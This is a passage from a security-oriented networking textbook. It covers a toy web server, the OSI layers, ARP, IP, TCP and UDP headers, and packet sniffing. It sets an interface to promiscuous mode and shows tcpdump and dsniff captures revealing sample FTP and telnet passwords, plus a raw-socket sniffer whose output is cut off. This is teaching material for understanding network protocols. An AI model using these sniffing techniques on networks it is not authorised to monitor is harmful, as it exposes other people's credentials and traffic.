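int parse_request_line(char *request, char **resource) {
   char *end = strstr(request, " HTTP/"); // Search for valid-looking request.

   if(end == NULL)                        // Then this isn't valid HTTP.
      return REQ_INVALID;
   *end = '\0';                           // Terminate at the end of the URL.

   if(strncmp(request, "GET ", 4) == 0) {
      *resource = request + 4;
      return REQ_GET;
   }
   if(strncmp(request, "HEAD ", 5) == 0) {
      *resource = request + 5;
      return REQ_HEAD;
   }
   return REQ_INVALID;                    // Not a recognized request.
}
```

Given the line "GET /image.jpg HTTP/1.1", the function returns REQ_GET and leaves *resource pointing at "/image.jpg".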

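The files index.html and image.jpg have been put into the webroot directory, as shown in the output below, and then the tinyweb program is compiled. Root privileges are needed to bind to any port below 1024, so the program is set to run as the root user (setuid root). The server's debugging output shows the results of a web browser's request for http://127.0.0.1.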

reader@hacking:~/booksrc $ ls -l webroot/
total 52
-rwxr--r-- 1 reader reader 46794 2007-05-28 23:43 image.jpg
-rw-r--r-- 1 reader reader   261 2007-05-28 23:42 index.html
reader@hacking:~/booksrc $ cat webroot/index.html 
<html>
<head><title>A sample webpage</title></head>
<body bgcolor="#000000" text="#ffffffff">
<center>
<h1>This is a sample webpage</h1>
...and here is some sample text<br>
<br>
..and even a sample image:<br>
<img src="image.jpg"><br>
</center>
</body>
</html>
reader@hacking:~/booksrc $ gcc -o tinyweb tinyweb.c
reader@hacking:~/booksrc $ sudo chown root ./tinyweb
reader@hacking:~/booksrc $ sudo chmod u+s ./tinyweb
reader@hacking:~/booksrc $ ./tinyweb
Accepting web requests on port 80
Got request from 127.0.0.1:52996 "GET / HTTP/1.1"
        Opening './webroot/index.html'   200 OK
Got request from 127.0.0.1:52997 "GET /image.jpg HTTP/1.1"
        Opening './webroot/image.jpg'    200 OK
Got request from 127.0.0.1:52998 "GET /favicon.ico HTTP/1.1"
        Opening './webroot/favicon.ico' 404 Not Found

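The address 127.0.0.1 is a special loopback address that routes to the local machine. The initial request fetches index.html from the web server, and the browser then requests image.jpg. In addition, the browser automatically requests favicon.ico in an attempt to retrieve an icon for the web page. The screenshot below shows the results of this request in a browser.

Figure 0x400-3.

Peeling Back the Lower Layers

When you use a web browser, all seven OSI layers are taken care of for you, allowing you to focus on browsing rather than on protocols. At the upper layers of the OSI model, many protocols can be plaintext, since all the other details of the connection are already handled by the lower layers. Sockets exist on the session layer (5), providing an interface for sending data from one host to another. TCP on the transport layer (4) provides reliability and transport control, while IP on the network layer (3) provides addressing and packet-level communication. Ethernet on the data-link layer (2) provides addressing between Ethernet ports, suitable for basic LAN (local area network) communication. At the bottom, the physical layer (1) is simply the wire and the protocol used to send bits from one device to another. A single HTTP message is wrapped in multiple layers as it passes through the different aspects of communication.

This process can be pictured as an elaborate interoffice bureaucracy, reminiscent of the movie Brazil. At each layer sits a highly specialized receptionist who understands only the language and protocol of that layer. As a packet is transmitted, each receptionist performs the duties of her particular layer, puts the packet into an interoffice envelope, writes the header on the outside, and passes it on to the receptionist at the next layer. That receptionist, in turn, performs the duties of his layer, puts the whole envelope inside another envelope, writes the header on the outside, and passes it along. Network traffic is a chattering bureaucracy of servers, clients, and peer-to-peer connections. At the higher layers, the traffic could be financial data, email, or basically anything. Regardless of what the packets contain, the protocols used at the lower layers to move data from point A to point B are usually the same. Once you understand the office bureaucracy of these common lower-layer protocols, you can peek inside envelopes in transit and even falsify documents to manipulate the system.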

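Data-Link Layer

The lowest visible layer is the data-link layer. Returning to the analogy of receptionists and bureaucracy, if the physical layer below is thought of as the interoffice mail carts and the network layer above as a worldwide postal system, then the data-link layer is the interoffice mail system. This layer provides a way to address and send messages to anyone in the office, as well as a way to figure out who is in the office.

Ethernet exists on this layer, providing a standard addressing system for all Ethernet devices. These addresses are known as Media Access Control (MAC) addresses. Every Ethernet device is assigned a globally unique address consisting of six bytes, usually written in hexadecimal in the form xx:xx:xx:xx:xx:xx. These addresses are also sometimes called hardware addresses, since each address is unique to a piece of hardware and is stored in the device's integrated circuit memory. A MAC address can be thought of as a Social Security number for hardware, since each piece of hardware is supposed to have a unique one.

An Ethernet header is 14 bytes in size and contains the source and destination MAC addresses for the Ethernet packet. Ethernet addressing also provides a special broadcast address, consisting of all binary 1s (ff:ff:ff:ff:ff:ff). Any Ethernet packet sent to this address is delivered to all connected devices.

The MAC address of a network device isn't meant to change, but its IP address may change regularly. The concept of IP addresses doesn't exist at this layer, only hardware addresses do, so a method is needed to correlate the two addressing schemes. In the office, mail sent to an employee at the office's address ends up on the appropriate desk. In Ethernet, the method is known as the Address Resolution Protocol (ARP).

This protocol allows "seating charts" to be made that associate an IP address with a piece of hardware. There are four different types of ARP messages, but the two most important are ARP request messages and ARP reply messages. Every packet's Ethernet header includes a type value that describes the packet. This type is used to specify whether the packet is an ARP-type message or an IP packet.

An ARP request is a message sent to the broadcast address that contains the sender's IP address and MAC address and basically says, "Hey, who has this IP? If it's you, please respond and tell me your MAC address." An ARP reply is the corresponding response, sent to the requester's MAC address (and IP address), that says, "This is my MAC address, and I have this IP address." Most implementations temporarily cache the MAC/IP address pairs received in ARP replies, so that ARP requests and replies aren't needed for every single packet. These caches are like the interoffice seating chart.

For example, if one system has the IP address 10.10.10.20 and MAC address 00:00:00:aa:aa:aa, and another system on the same network has the IP address 10.10.10.50 and MAC address 00:00:00:bb:bb:bb, neither system can communicate with the other until they know each other's MAC addresses.

Figure 0x400-4.

If the first system wants to establish a connection over IP to the second device's IP address of 10.10.10.50, the first system first checks its ARP cache to see whether an entry exists for 10.10.10.50. Since this is the first time these two systems are trying to communicate, there is no such entry, and an ARP request is sent to the broadcast address, saying, "If you are 10.10.10.50, please respond to me at 00:00:00:aa:aa:aa." Since this request uses the broadcast address, every system on the network sees it, but only the system with the corresponding IP address is meant to respond. In this case, the second system responds with an ARP reply sent directly back to 00:00:00:aa:aa:aa, saying, "I am 10.10.10.50 and I'm at 00:00:00:bb:bb:bb." The first system receives this reply, caches the IP and MAC address pair in its ARP cache, and uses the hardware address to communicate.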
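
The "seating chart" idea can be illustrated with a toy ARP cache. This is a sketch under simplifying assumptions: a small fixed-size table, no entry expiry, and names (arp_cache, arp_lookup(), arp_learn()) invented for this example. Real operating system ARP caches are more involved.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ARP_CACHE_SLOTS 8 // Arbitrary size chosen for this sketch

struct arp_entry {
   uint32_t ip;          // IPv4 address as a 32-bit value
   unsigned char mac[6]; // Hardware address for that IP
   int in_use;           // 0 while the slot is empty
};

struct arp_cache {
   struct arp_entry slots[ARP_CACHE_SLOTS];
};

/* Return the cached MAC address for ip, or NULL when there is no entry
 * (the situation in which an ARP request would have to be broadcast).
 */
const unsigned char *arp_lookup(const struct arp_cache *cache, uint32_t ip) {
   int i;
   for(i = 0; i < ARP_CACHE_SLOTS; i++)
      if(cache->slots[i].in_use && cache->slots[i].ip == ip)
         return cache->slots[i].mac;
   return NULL;
}

/* Record an IP/MAC pair learned from an ARP reply.  An existing entry
 * for the same IP is overwritten.  Returns 1 on success, 0 if full.
 */
int arp_learn(struct arp_cache *cache, uint32_t ip, const unsigned char *mac) {
   int i, free_slot = -1;
   for(i = 0; i < ARP_CACHE_SLOTS; i++) {
      if(cache->slots[i].in_use && cache->slots[i].ip == ip) {
         free_slot = i; // Reuse the slot that already holds this IP.
         break;
      }
      if(!cache->slots[i].in_use && free_slot == -1)
         free_slot = i; // Remember the first empty slot.
   }
   if(free_slot == -1)
      return 0;
   cache->slots[free_slot].ip = ip;
   memcpy(cache->slots[free_slot].mac, mac, 6);
   cache->slots[free_slot].in_use = 1;
   return 1;
}
```

In the scenario above, the first lookup for 10.10.10.50 returns NULL; after the reply is recorded with arp_learn(), later lookups return 00:00:00:bb:bb:bb without any further broadcast.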

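Network Layer

The network layer is like a worldwide postal service, providing an addressing and delivery method used to send things everywhere. The protocol used at this layer for Internet addressing and delivery is, appropriately, called the Internet Protocol (IP); the majority of the Internet uses IP version 4.

Every system on the Internet has an IP address, consisting of the familiar four-byte arrangement in the form xx.xx.xx.xx. The IP header for packets at this layer is 20 bytes in size and consists of the various fields and bit flags defined in RFC 791.

From RFC 791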

[Page 10]
September 1981
                                                       Internet Protocol
                           3.  SPECIFICATION

3.1.  Internet Header Format

  A summary of the contents of the internet header follows:

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |Version|  IHL  |Type of Service|          Total Length         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         Identification        |Flags|      Fragment Offset    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Time to Live |    Protocol   |         Header Checksum       |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                       Source Address                          |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Destination Address                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Options                    |    Padding    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

                    Example Internet Datagram Header

                               Figure 4.
Note that each tick mark represents one bit position.

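This surprisingly descriptive ASCII diagram shows these fields and their positions in the header. Standard protocols have excellent documentation. Similar to the Ethernet header, the IP header has a protocol field that describes the type of data in the packet, along with the source and destination addresses used for routing. In addition, the header carries a checksum to help detect transmission errors, as well as fields for dealing with packet fragmentation.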
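
The header checksum mentioned above is the 16-bit one's complement of the one's complement sum of the header's 16-bit words, computed with the checksum field itself set to zero (as specified in RFC 791). The following is a minimal sketch; the function name ip_checksum() is an assumption made for this example.

```c
#include <stddef.h>
#include <stdint.h>

/* Compute the Internet checksum over len bytes.  Bytes are combined
 * into big-endian 16-bit words, so the result does not depend on the
 * byte order of the host.  (Hypothetical helper, for illustration only.)
 */
uint16_t ip_checksum(const unsigned char *header, size_t len) {
   uint32_t sum = 0;
   size_t i;

   for(i = 0; i + 1 < len; i += 2)            // Add up 16-bit words.
      sum += ((uint32_t)header[i] << 8) | header[i + 1];
   if(len & 1)                                // Odd trailing byte, if any,
      sum += (uint32_t)header[len - 1] << 8;  //  is padded with a zero.
   while(sum >> 16)                           // Fold the carries back in.
      sum = (sum & 0xffff) + (sum >> 16);
   return (uint16_t)~sum;                     // One's complement of the sum.
}
```

As a check, the 20 header bytes of the first packet in the FTP capture shown later in this section (45 00 00 5d e0 65 40 00 80 06 97 ad c0 a8 00 76 c0 a8 00 c1) give 0x97ad when the checksum field is zeroed first, which is the value the packet carries. Running the function over the header with the checksum left in place gives 0, which is how a receiver can verify it.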

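The Internet Protocol is mostly used to transmit packets wrapped by higher layers. However, Internet Control Message Protocol (ICMP) packets also exist on this layer. ICMP packets are used for messaging and diagnostics. IP is less reliable than the post office: there is no guarantee that an IP packet will actually reach its final destination. If there is a problem, an ICMP packet is sent back to notify the sender.

ICMP is also commonly used to test connectivity. The ping utility uses ICMP Echo Request and Echo Reply messages. If one host wants to test whether it can route traffic to another host, it pings the remote host by sending an ICMP Echo Request. Upon receiving the ICMP Echo Request, the remote host sends back an ICMP Echo Reply. These messages can be used to determine the connection latency between the two hosts. However, it is important to remember that ICMP and IP are both connectionless; all this protocol layer really cares about is getting a packet to its destination address.

Sometimes a network link has a limit on packet size and doesn't allow large packets to be transferred. IP can deal with this situation by fragmenting packets, as shown in the figure.

Figure 0x400-5.

The packet is broken up into smaller fragments that can pass through the network link, an IP header is put on each fragment, and the fragments are sent off. Each fragment has a different fragment offset value, which is stored in its header. When the destination receives these fragments, it uses the offset values to reassemble the original IP packet.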
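
The arithmetic behind fragmentation can be sketched as follows. Two details come from RFC 791 rather than from the text above: the fragment offset field counts in units of 8 bytes, and every fragment except the last has a "more fragments" flag set. The struct and function names are assumptions made for this example, and a plain 20-byte header without options is assumed.

```c
#include <stddef.h>

#define IP_HEADER_LEN 20 // Assumes an IP header without options

struct fragment {
   size_t offset_units;  // Fragment offset field, in 8-byte units
   size_t data_len;      // Payload bytes carried by this fragment
   int more_fragments;   // 1 for every fragment except the last
};

/* Split payload_len bytes of IP payload for a link with the given MTU.
 * Returns the number of fragments written to out, or 0 if the MTU is
 * too small or more than max_out fragments would be needed.
 */
size_t plan_fragments(size_t payload_len, size_t mtu,
                      struct fragment *out, size_t max_out) {
   size_t per_fragment, done = 0, count = 0;

   if(mtu < IP_HEADER_LEN + 8)
      return 0;
   // Data per fragment must be a multiple of 8 so that offsets work out.
   per_fragment = (mtu - IP_HEADER_LEN) & ~(size_t)7;

   while(done < payload_len) {
      size_t chunk = payload_len - done;
      if(chunk > per_fragment)
         chunk = per_fragment;
      if(count == max_out)
         return 0;
      out[count].offset_units = done / 8;
      out[count].data_len = chunk;
      out[count].more_fragments = (done + chunk < payload_len);
      done += chunk;
      count++;
   }
   return count;
}
```

For a 4,000-byte payload and an MTU of 1,500, this yields three fragments carrying 1,480, 1,480, and 1,040 bytes, with offset values 0, 185, and 370.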

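Provisions such as fragmentation aid in the delivery of IP packets, but they do nothing to maintain connections or ensure delivery. That is the job of the protocols at the transport layer.

Transport Layer

The transport layer can be thought of as the first line of office receptionists, picking up the mail from the network layer. If a customer wants to return a defective piece of merchandise, they send a message requesting a Return Material Authorization (RMA) number. The receptionist then follows the return protocol by asking for a receipt and eventually issuing an RMA number so the customer can mail the product in. The post office is only concerned with carrying these messages (and packages) back and forth, not with what's in them.

The two major protocols at this layer are the Transmission Control Protocol (TCP) and the User Datagram Protocol (UDP). TCP is the most commonly used protocol for services on the Internet: telnet, HTTP (web traffic), SMTP (email traffic), and FTP (file transfers) all use TCP. One of the reasons for TCP's popularity is that it provides a transparent, yet reliable and bidirectional, connection between two IP addresses. Stream sockets use TCP/IP connections. A bidirectional TCP connection is similar to using a telephone: after dialing a number, a connection is made through which both parties can communicate. Reliability simply means that TCP ensures that all the data reaches its destination in the proper order. If the packets of a connection get jumbled and arrive out of order, TCP makes sure they are put back in order before handing the data up to the next layer. If some packets in the middle of a connection are lost, the destination holds on to the packets it has while the source retransmits the missing ones.

All of this functionality is made possible by a set of flags, called TCP flags, and by tracking values called sequence numbers. The TCP flags are as follows: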

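TCP flag	Meaning	Purpose
URG	Urgent	Identifies important data
ACK	Acknowledgment	Acknowledges a packet; it is turned on for the majority of the connection
PSH	Push	Tells the receiver to push the data through instead of buffering it
RST	Reset	Resets a connection
SYN	Synchronize	Synchronizes sequence numbers at the beginning of a connection
FIN	Finish	Gracefully closes a connection when both sides say goodbye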

These flags are stored in the TCP header along with the source and destination ports. The TCP header is specified in RFC 793.

From RFC 793

[Page 14]

September 1981
                                           Transmission Control Protocol

                      3.  FUNCTIONAL SPECIFICATION

3.1.  Header Format

  TCP segments are sent as internet datagrams.  The Internet Protocol
  header carries several information fields, including the source and
  destination host addresses [2].  A TCP header follows the internet
  header, supplying information specific to the TCP protocol.  This
  division allows for the existence of host level protocols other than
  TCP.

  TCP Header Format

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          Source Port          |       Destination Port        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                        Sequence Number                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Acknowledgment Number                      |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Data |           |U|A|P|R|S|F|                               |
   | Offset| Reserved  |R|C|S|S|Y|I|            Window             |
   |       |           |G|K|H|T|N|N|                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |           Checksum            |         Urgent Pointer        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Options                    |    Padding    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                             data                              |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

                            TCP Header Format

          Note that one tick mark represents one bit position.

                               Figure 3.

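The sequence number and acknowledgment number are used to maintain state. The SYN and ACK flags are used together to open connections in a three-step handshaking process. When a client wants to open a connection with a server, a packet with the SYN flag on, but the ACK flag off, is sent to the server. The server then responds with a packet that has both the SYN and ACK flags turned on. To complete the connection, the client sends back a packet with the SYN flag off but the ACK flag on. After that, every packet in the connection has the ACK flag turned on and the SYN flag turned off. Only the first two packets of the connection have the SYN flag on, since those packets are used to synchronize sequence numbers.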
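
In the header diagram above, the six flags occupy the low bits of the byte at offset 13 of the TCP header, with FIN as the least significant bit. The sketch below defines masks for them and classifies a flags byte according to the handshake steps just described. The macro names, the HS_ constants, and the function classify_handshake() are assumptions made for this example.

```c
/* Bit masks for the TCP flags byte (offset 13 of the TCP header) */
#define TCP_FIN 0x01
#define TCP_SYN 0x02
#define TCP_RST 0x04
#define TCP_PSH 0x08
#define TCP_ACK 0x10
#define TCP_URG 0x20

enum { HS_NONE = 0, HS_SYN = 1, HS_SYN_ACK = 2, HS_ACK = 3 };

/* Map a flags byte to a step of the three-step handshake.  Note that
 * HS_ACK describes both the third handshake packet and every ordinary
 * packet sent afterward, since both have ACK on and SYN off.
 */
int classify_handshake(unsigned char flags) {
   unsigned char syn_ack = flags & (TCP_SYN | TCP_ACK);

   if(flags & (TCP_RST | TCP_FIN)) // Resets and closes aren't handshake steps.
      return HS_NONE;
   if(syn_ack == TCP_SYN)          // Step 1: SYN on, ACK off (client)
      return HS_SYN;
   if(syn_ack == (TCP_SYN | TCP_ACK)) // Step 2: both on (server)
      return HS_SYN_ACK;
   if(syn_ack == TCP_ACK)          // Step 3 and later: ACK on, SYN off
      return HS_ACK;
   return HS_NONE;
}
```

For instance, the flags byte 0x18 that appears in several packets of the FTP capture later in this section is PSH and ACK together, so it is classified as HS_ACK.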

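Figure 0x400-6.

Sequence numbers allow TCP to put unordered packets back into order, to determine whether packets are missing, and to prevent mixing up packets from other connections.

When a connection is initiated, each side generates an initial sequence number. This number is communicated to the other side in the first two SYN packets of the connection handshake. Then, with each packet that is sent, the sequence number is incremented by the number of bytes found in the data portion of the packet. This sequence number is included in the TCP packet header. In addition, each TCP header carries an acknowledgment number, which is the next sequence number expected from the other side; during the handshake, this is simply the other side's initial sequence number plus one.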
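
The relationship between sequence and acknowledgment numbers comes down to 32-bit arithmetic that wraps around. The sketch below computes the acknowledgment number a receiver would send for a given packet. The function name expected_ack() is an assumption made for this example; the rule that SYN and FIN each consume one sequence number comes from RFC 793.

```c
#include <stdint.h>

/* Return the acknowledgment number that answers a packet with the
 * given sequence number and data length.  SYN and FIN packets use up
 * one sequence number even though they may carry no data.
 * (Hypothetical helper, for illustration only.)
 */
uint32_t expected_ack(uint32_t seq, uint32_t data_len, int syn_or_fin) {
   // Unsigned 32-bit addition wraps around, just as TCP sequence numbers do.
   return seq + data_len + (syn_or_fin ? 1u : 0u);
}
```

The FTP capture later in this section gives a real instance: the server's first packet has sequence number 0x292e8a73 and carries 41 bytes of data, and the client's next packet acknowledges 0x292e8a9c, which is exactly 0x292e8a73 plus 41.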

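TCP is great for applications where reliability and bidirectional communication are needed. However, the cost of this functionality is paid in communication overhead.

UDP has much less overhead and built-in functionality than TCP. This lack of functionality makes it behave much like the IP protocol: it is connectionless and unreliable. Without built-in functionality to create connections and maintain reliability, UDP is an alternative that expects the application to deal with these issues. Sometimes connections aren't needed, and the lightweight UDP is a much better protocol for those situations. The UDP header, defined in RFC 768, is relatively tiny. It contains only four 16-bit values in the following order: source port, destination port, length, and checksum.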
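
Because the UDP header is just four 16-bit values in network byte order, it can be decoded in a few lines. The struct and function names below are assumptions made for this sketch, and the sample bytes mentioned afterward are made up rather than taken from a capture.

```c
#include <stdint.h>

struct udp_hdr_fields {
   uint16_t src_port;  // Source port
   uint16_t dest_port; // Destination port
   uint16_t length;    // Length of UDP header plus data, in bytes
   uint16_t checksum;  // Checksum
};

/* Read one big-endian (network byte order) 16-bit value. */
static uint16_t read_be16(const unsigned char *p) {
   return (uint16_t)((p[0] << 8) | p[1]);
}

/* Decode the 8-byte UDP header found at bytes into host-order fields. */
void parse_udp_header(const unsigned char *bytes, struct udp_hdr_fields *out) {
   out->src_port  = read_be16(bytes);
   out->dest_port = read_be16(bytes + 2);
   out->length    = read_be16(bytes + 4);
   out->checksum  = read_be16(bytes + 6);
}
```

For the made-up header bytes 80 0a 00 35 00 0c 00 00, this gives source port 32778, destination port 53, and a length of 12 (the 8-byte header plus 4 bytes of data).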

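Network Sniffing

On the data-link layer lies the distinction between switched and unswitched networks. On an unswitched network, Ethernet packets pass through every device on the network, with the expectation that each system will only look at the packets sent to its own address. However, it is fairly trivial to set a device to promiscuous mode, which causes it to look at all packets, regardless of the destination address. Most packet-capturing programs, such as tcpdump, put the device they are listening on into promiscuous mode by default. Promiscuous mode can be set using ifconfig, as seen in the following output.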

reader@hacking:~/booksrc $ ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:0C:29:34:61:65
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:17115 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1927 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4602913 (4.3 MiB)  TX bytes:434449 (424.2 KiB)
          Interrupt:16 Base address:0x2024

reader@hacking:~/booksrc $ sudo ifconfig eth0 promisc
reader@hacking:~/booksrc $ ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:0C:29:34:61:65
          UP BROADCAST RUNNING PROMISC MULTICAST  MTU:1500  Metric:1
          RX packets:17181 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1927 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4668475 (4.4 MiB)  TX bytes:434449 (424.2 KiB)
          Interrupt:16 Base address:0x2024

reader@hacking:~/booksrc $

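The act of capturing packets that aren't necessarily meant for public viewing is called sniffing. Sniffing packets in promiscuous mode on an unswitched network can turn up all sorts of useful information, as the following output shows.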

reader@hacking:~/booksrc $ sudo tcpdump -l -X 'ip host 192.168.0.118'
tcpdump: listening on eth0
21:27:44.684964 192.168.0.118.ftp > 192.168.0.193.32778: P 1:42(41) ack 1 win
17316 <nop,nop,timestamp 466808 920202> (DF)
0x0000   4500 005d e065 4000 8006 97ad c0a8 0076        E..].e@........v
0x0010   c0a8 00c1 0015 800a 292e 8a73 5ed4 9ce8        ........)..s^...
0x0020   8018 43a4 a12f 0000 0101 080a 0007 1f78        ..C../.........x
0x0030   000e 0a8a 3232 3020 5459 5053 6f66 7420        ....220.TYPSoft.
0x0040   4654 5020 5365 7276 6572 2030 2e39 392e        FTP.Server.0.99.
0x0050   3133                                           13
21:27:44.685132 192.168.0.193.32778 > 192.168.0.118.ftp: . ack 42 win 5840
<nop,nop,timestamp 920662 466808> (DF) [tos 0x10]
0x0000   4510 0034 966f 4000 4006 21bd c0a8 00c1        E..4.o@.@.!.....
0x0010   c0a8 0076 800a 0015 5ed4 9ce8 292e 8a9c        ...v....^...)...
0x0020   8010 16d0 81db 0000 0101 080a 000e 0c56        ...............V
0x0030   0007 1f78                                      ...x
21:27:52.406177 192.168.0.193.32778 > 192.168.0.118.ftp: P 1:13(12) ack 42 win
5840 <nop,nop,timestamp 921434 466808> (DF) [tos 0x10]
0x0000   4510 0040 9670 4000 4006 21b0 c0a8 00c1        E..@.p@.@.!.....
0x0010   c0a8 0076 800a 0015 5ed4 9ce8 292e 8a9c        ...v....^...)...
0x0020   8018 16d0 edd9 0000 0101 080a 000e 0f5a        ...............Z
0x0030   0007 1f78 5553 4552 206c 6565 6368 0d0a        ...xUSER.leech..
21:27:52.415487 192.168.0.118.ftp > 192.168.0.193.32778: P 42:76(34) ack 13
win 17304 <nop,nop,timestamp 466885 921434> (DF)
0x0000   4500 0056 e0ac 4000 8006 976d c0a8 0076        E..V..@....m...v
0x0010   c0a8 00c1 0015 800a 292e 8a9c 5ed4 9cf4        ........)...^...
0x0020   8018 4398 4e2c 0000 0101 080a 0007 1fc5        ..C.N,..........
0x0030   000e 0f5a 3333 3120 5061 7373 776f 7264        ...Z331.Password
0x0040   2072 6571 7569 7265 6420 666f 7220 6c65        .required.for.le
0x0050   6563                                           ec
21:27:52.415832 192.168.0.193.32778 > 192.168.0.118.ftp: . ack 76 win 5840
<nop,nop,timestamp 921435 466885> (DF) [tos 0x10]
0x0000   4510 0034 9671 4000 4006 21bb c0a8 00c1        E..4.q@.@.!.....
0x0010   c0a8 0076 800a 0015 5ed4 9cf4 292e 8abe        ...v....^...)...
0x0020   8010 16d0 7e5b 0000 0101 080a 000e 0f5b        ....~[.........[
0x0030   0007 1fc5                                      ....
21:27:56.155458 192.168.0.193.32778 > 192.168.0.118.ftp: P 13:27(14) ack 76
win 5840 <nop,nop,timestamp 921809 466885> (DF) [tos 0x10]
0x0000   4510 0042 9672 4000 4006 21ac c0a8 00c1        E..B.r@.@.!.....
0x0010   c0a8 0076 800a 0015 5ed4 9cf4 292e 8abe        ...v....^...)...
0x0020   8018 16d0 90b5 0000 0101 080a 000e 10d1        ................
0x0030   0007 1fc5 5041 5353 206c 3840 6e69 7465        ....PASS.l8@nite
0x0040   0d0a                                           ..
21:27:56.179427 192.168.0.118.ftp > 192.168.0.193.32778: P 76:103(27) ack 27
win 17290 <nop,nop,timestamp 466923 921809> (DF)
0x0000   4500 004f e0cc 4000 8006 9754 c0a8 0076        E..O..@....T...v
0x0010   c0a8 00c1 0015 800a 292e 8abe 5ed4 9d02        ........)...^...
0x0020   8018 438a 4c8c 0000 0101 080a 0007 1feb        ..C.L...........
0x0030   000e 10d1 3233 3020 5573 6572 206c 6565        ....230.User.lee
0x0040   6368 206c 6f67 6765 6420 696e 2e0d 0a          ch.logged.in...

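Data transmitted over the network by services such as telnet, FTP, and POP3 is unencrypted. In the preceding example, the user leech is seen logging into an FTP server using the password l8@nite. Since the authentication process during login is also unencrypted, usernames and passwords are simply contained in the data portions of the transmitted packets.

tcpdump is a wonderful, general-purpose packet sniffer, but there are specialized sniffing tools designed specifically to search for usernames and passwords. One notable example is Dug Song's program dsniff, which is smart enough to parse out data that looks important.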

reader@hacking:~/booksrc $ sudo dsniff -n
dsniff: listening on eth0
-----------------
12/10/02 21:43:21 tcp 192.168.0.193.32782 -> 192.168.0.118.21 (ftp)
USER leech
PASS l8@nite

-----------------
12/10/02 21:47:49 tcp 192.168.0.193.32785 -> 192.168.0.120.23 (telnet)
USER root 
PASS 5eCr3t

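Raw Socket Sniffer

So far in our code examples, we have been using stream sockets. When sending and receiving with stream sockets, the data is neatly wrapped in a TCP/IP connection. Because the program accesses the OSI model at the session (5) layer, the operating system takes care of all the lower-level details of transmission, correction, and routing. It is possible to access the network at lower layers using raw sockets. At this lower level, all the details are exposed and must be handled explicitly by the programmer. Raw sockets are specified by using SOCK_RAW as the type. In this case the protocol matters, since there are multiple options: the protocol can be IPPROTO_TCP, IPPROTO_UDP, or IPPROTO_ICMP. The following example is a TCP sniffing program that uses raw sockets.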

raw_tcpsniff.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#include "hacking.h"

int main(void) {
   int i, recv_length, sockfd;

   u_char buffer[9000];

   if ((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
      fatal("in socket");

   for(i=0; i < 3; i++) {
      recv_length = recv(sockfd, buffer, 8000, 0);
      printf("Got a %d byte packet\n", recv_length);
      dump(buffer, recv_length);
   }
}

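This program opens a raw TCP socket and listens for three packets, printing the raw data of each one with the dump() function. Notice that the buffer is declared as a u_char variable. This is just a convenience type definition, brought in through sys/socket.h, that expands to "unsigned char". It exists for convenience, since unsigned variables are used a lot in network programming and typing unsigned every time is a pain.

Once compiled, the program needs to be run as root, because the use of raw sockets requires root access. The following output shows the program sniffing the network while sample text is being sent to our simple server.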

reader@hacking:~/booksrc $ gcc -o raw_tcpsniff raw_tcpsniff.c
reader@hacking:~/booksrc $ ./raw_tcpsniff
[!!] Fatal Error in socket: Operation not permitted
reader@hacking:~/booksrc $ sudo ./raw_tcpsniff
Got a 68 byte packet
45 10 00 44 1e 36 40 00 40 06 46 23 c0 a8 2a 01 | E..D.6@.@.F#..*.
c0 a8 2a f9 8b 12 1e d2 ac 14 cf 92 e5 10 6c c9 | ..*...........l.
80 18 05 b4 32 47 00 00 01 01 08 0a 26 ab 9a f1 | ....2G......&...
02 3b 65 b7 74 68 69 73 20 69 73 20 61 20 74 65 | .;e.this is a te
73 74 0d 0a                                     | st..
Got a 70 byte packet
45 10 00 46 1e 37 40 00 40 06 46 20 c0 a8 2a 01 | E..F.7@.@.F ..*.
c0 a8 2a f9 8b 12 1e d2 ac 14 cf a2 e5 10 6c c9 | ..*...........l.
